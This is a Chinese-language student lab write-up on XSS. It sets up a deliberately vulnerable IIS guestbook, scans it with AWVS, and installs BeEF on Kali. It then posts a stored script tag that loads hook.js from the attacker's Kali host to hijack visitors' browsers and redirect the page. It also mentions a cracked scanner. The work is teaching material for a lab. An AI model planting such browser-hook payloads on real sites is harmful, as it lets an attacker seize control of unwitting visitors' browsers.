Network penetration test experiment _3： NXSS 和 SQL 注入

實驗目的

瞭解什麼是XSS；瞭解XSS攻擊實施，理解防禦XSS攻擊的方法；瞭解SQL隱碼攻擊的基本原理；掌握PHP指令碼訪問MySQL資料庫的基本方法；掌握程式設計中避免出現SQL隱碼攻擊漏洞的基本方法；掌握網站配置。

系統環境

Kali Linux 2、Windows Server

網路環境

交換網路結構

實驗工具

Beef；AWVS(Acunetix Web Vulnarability Scanner);SqlMAP；DVWA

實驗步驟

XSS部分：利用Beef劫持被攻擊者客戶端瀏覽器

實驗環境搭建。

角色：留言簿網站。存在XSS漏洞；（IIS或Apache、guestbook搭建）
攻擊者：Kali（使用beEF生成惡意程式碼，並通過留言方式提交到留言簿網站）；
被攻擊者：訪問留言簿網站，瀏覽器被劫持。

0. 搭建GustBook網站

在管理工具裡開啟Internet資訊服務(IIS)管理器，在網站資料夾上新建網站，網站描述隨意，ip地址為Windows Server的ip，埠80即可。↓

選擇路徑的時候除了選取到資料夾還要注意要允許訪問匿名網站，否則檢查不到漏洞。↓

許可權給滿滿的。↓

搭建完網站後更改網站目錄許可權，新增Everyone使用者組並設定為完全控制。↓


然後還要改幾個小選項。↓

1. 利用AWVS掃描留言簿網站

破解進入軟體後，點選"File"–“New”–"Web Site Scan"來啟動Scan Wizard介面
在Scan single website中輸入網址：****，點選Next…………直到出表。↓

最後結果如下，於error.asp和add.asp中分別有一個XSS漏洞。↓

2. Kali使用beef生成惡意程式碼

Kali-2020中現在不自帶Beef，需要我們們自己安裝，命令↓
sudo apt-get install beef-xss
然後進入資料夾↓
cd /usr/share/beef-xss
最後輸入./beef就ok了。
第一次會提示不要用預設的賬號密碼的提示，我當時做完忘截圖了……，不過報錯提示是↓

按照提示中的檔案進行修改 sudo vim /etc/beef-xss/config.yaml
(vim用法自行搜尋）

在這裡我把賬號密碼逆向設定，儲存退出後再./beef。↑

注

這個如果是預設使用者可能會導致開啟失敗，所以我們可以切換為root許可權，再./beef。（如果本身就是以root開局，那就當我沒說）


提示已經啟動了，然後我就可以用kali的火狐瀏覽器開啟連結http://127.0.0.1:3000/ui/authentication。↓
輸入之前設定的賬號密碼，進入這個頁面。↓

檢視XSS指令碼。↓

對方如果訪問這個網站，對方的瀏覽器就會被劫持。

3. 訪問http://留言簿網站/message.asp;將惡意程式碼寫入網站留言板

惡意程式碼：

<script src="http://Kali的IP地址:3000/hook.js"></script>

一開始使用10.34.80.233的那個ip是寫死的，我在kali上訪問不了，一開始我以為是埠的原因，我就換了個8888埠的，後來掃描發現kali和windows server不在一個網段裡，查兩者的閘道器發現兩者閘道器都不一樣。所以我就把windows server設為自動獲取ip。再次nmap -sP ，兩者在同一網段內，kali也可以訪問留言簿了。

看到這個頁面發現我們可以說是成功了，看不見我們的html程式碼表示程式碼已被成功載入。

重新整理頁面或者點選首頁會出彈框。↓

然後我們回到kali這邊發現資訊已經瘋狂載入，紅色部分的一直在重複，我就不截圖了。↓
可以看到很多資訊，我們還可以幹一些“活兒”。↓
“活兒”↓

我們按照箭頭指示更改連結為：青檸起始頁，並Execute.↑

然後我們瀏覽留言簿頁面就會載入為青檸起始頁。↓